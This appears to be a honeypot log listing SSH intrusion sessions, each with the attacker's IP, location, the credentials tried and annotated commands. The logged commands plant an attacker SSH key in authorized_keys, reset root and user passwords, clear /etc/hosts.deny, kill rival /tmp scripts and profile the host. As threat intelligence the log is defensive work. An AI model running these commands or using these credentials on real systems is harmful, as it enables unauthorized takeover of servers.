$ echo "!QAZ2wsx#EDC\nkN6uo9fDkdOe\nkN6uo9fDkdOe\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123\nzBpufpqKyy8h\nzBpufpqKyy8h"|passwd|bash
$ echo "123\nzBpufpqKyy8h\nzBpufpqKyy8h\n"|passwd
🎭 batik_root (115.135.235.126) β€” Petaling Jaya, Malaysia Β· 1 session Β· 2 cmds
2026-05-25 02:11 EDT Β· as ubuntu/123456aA
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 blitz_crypto (45.130.127.173) β€” Frankfurt am Main, Germany Β· 1 session Β· 2 cmds
2026-05-25 02:09 EDT Β· as bitcoin/bitcoin
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 sakura_root_4 (43.165.185.71) β€” Tokyo, Japan Β· 1 session Β· 2 cmds
2026-05-25 02:08 EDT Β· as ubuntu/!QAZ2wsx#EDC
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 bear_sol (151.252.84.225) β€” Surgut, Russia Β· 1 session Β· 2 cmds
2026-05-25 02:02 EDT Β· as sameer/password
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 cipher_6 (113.161.222.150) β€” Ho Chi Minh City, Vietnam Β· 1 session Β· 2 cmds
2026-05-25 02:01 EDT Β· as oem/oem
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 wok_root_15 (117.132.5.139) β€” Jinan, China Β· 1 session Β· 2 cmds
2026-05-25 01:40 EDT Β· as deploy/qwe123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 tulip_root_5 (213.176.16.100) β€” Amsterdam, Netherlands Β· 4 sessions Β· 61 cmds
2026-05-19 19:53 EDT Β· as developer/dev, mysql/123456, root/123qweasd!@#
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:EwQfICfeghkI"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "dev\nq5iYYornb3Xa\nq5iYYornb3Xa"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "dev\nq5iYYornb3Xa\nq5iYYornb3Xa\n"|passwd
$ echo -e "123456\nwsZDt6PKaz4J\nwsZDt6PKaz4J"|passwd|bash
$ echo "123456\nwsZDt6PKaz4J\nwsZDt6PKaz4J\n"|passwd
🎭 cipher_root_55 (171.244.141.86) β€” Hanoi, Vietnam Β· 1 session Β· 2 cmds
2026-05-25 01:33 EDT Β· as root/123123a@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 strudel_root_8 (178.104.36.172) β€” Nuremberg, Germany Β· 3 sessions Β· 23 cmds
2026-05-24 08:09 EDT Β· as curl/welltech12, root/123qweasd!@#, root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:V8YBPHcQPIde"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_54 (179.33.186.150) β€” TurbanΓ‘, Colombia Β· 3 sessions Β· 6 cmds
2026-05-25 00:17 EDT Β· as curl/welltech12, kevin/kevin, root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 toucan_root_5 (45.169.200.254) β€” Cariacica, Brazil Β· 2 sessions Β· 22 cmds
2026-05-09 12:51 EDT Β· as curl/welltech12, ubuntu/q1w2e3r4t
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 3x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "q1w2e3r4t\n8Jpi7URKaKuO\n8Jpi7URKaKuO"|passwd|bash
$ Enter new UNIX password:
$ echo "q1w2e3r4t\n8Jpi7URKaKuO\n8Jpi7URKaKuO\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 lantern_root_23 (182.43.76.120) β€” Jinan, China Β· 5 sessions Β· 79 cmds
2026-05-19 12:47 EDT Β· as root/666666, root/Aa135246, root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo -e "1\n3NPvI8kKQpvP\n3NPvI8kKQpvP"|passwd|bash
$ Enter new UNIX password:
$ echo "1\n3NPvI8kKQpvP\n3NPvI8kKQpvP\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo "root:DypYd2UwoUF2"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ echo "root:qYq5JwYFAbZu"|chpasswd|bash
$ echo "root:28hblbk71Blx"|chpasswd|bash
🎭 chateau_root_8 (82.64.38.234) β€” May-sur-Orne, France Β· 2 sessions Β· 4 cmds
2026-05-24 22:58 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 rogue_root_67 (144.31.7.85) β€” Helsinki, Finland Β· 4 sessions Β· 8 cmds
2026-05-24 22:09 EDT Β· as curl/welltech12, root/Qwe@123456, root/abc.1234
file attribute tampering β†’ SSH key persistence (repeated file attribute tampering 4x)
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
🎭 cipher_root_56 (102.140.97.134) β€” Lagos, Nigeria Β· 1 session Β· 2 cmds
2026-05-24 21:54 EDT Β· as root/abc.1234
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 ramen_root_3 (124.155.125.131) β€” Azusawa, Japan Β· 1 session Β· 2 cmds
2026-05-24 21:48 EDT Β· as root/fjbdfdjkdsfs541544@@
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 phantom_root_65 (170.81.243.52) β€” Chiclayo, Peru Β· 3 sessions Β· 58 cmds
2026-05-24 20:36 EDT Β· as curl/welltech12, root/fjbdfdjkdsfs541544@@, root/yusuf
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:5PZ92FTa4zSW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "welltech12\nK644E95uAEvM\nK644E95uAEvM"|passwd|bash
$ Enter new UNIX password:
$ echo "welltech12\nK644E95uAEvM\nK644E95uAEvM\n"|passwd
$ echo "root:54D1tQ3a4i8f"|chpasswd|bash
🎭 stroopwafel_sol_4 (176.65.132.24) β€” Eygelshoven, The Netherlands Β· 1 session Β· 1 cmd
2026-05-24 21:00 EDT Β· as kevin/kevin
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m
🎭 hanbok_root_10 (222.107.254.110) β€” Seocho-gu, South Korea Β· 4 sessions Β· 79 cmds
2026-05-24 19:36 EDT Β· as curl/welltech12, postgres/159357, root/fjbdfdjkdsfs541544@@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:B6wp4XRUXhnm"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "159357\nfDqykA1Z79Zt\nfDqykA1Z79Zt"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "159357\nfDqykA1Z79Zt\nfDqykA1Z79Zt\n"|passwd
$ echo -e "welltech12\nnZJ4RCZf1cf0\nnZJ4RCZf1cf0"|passwd|bash
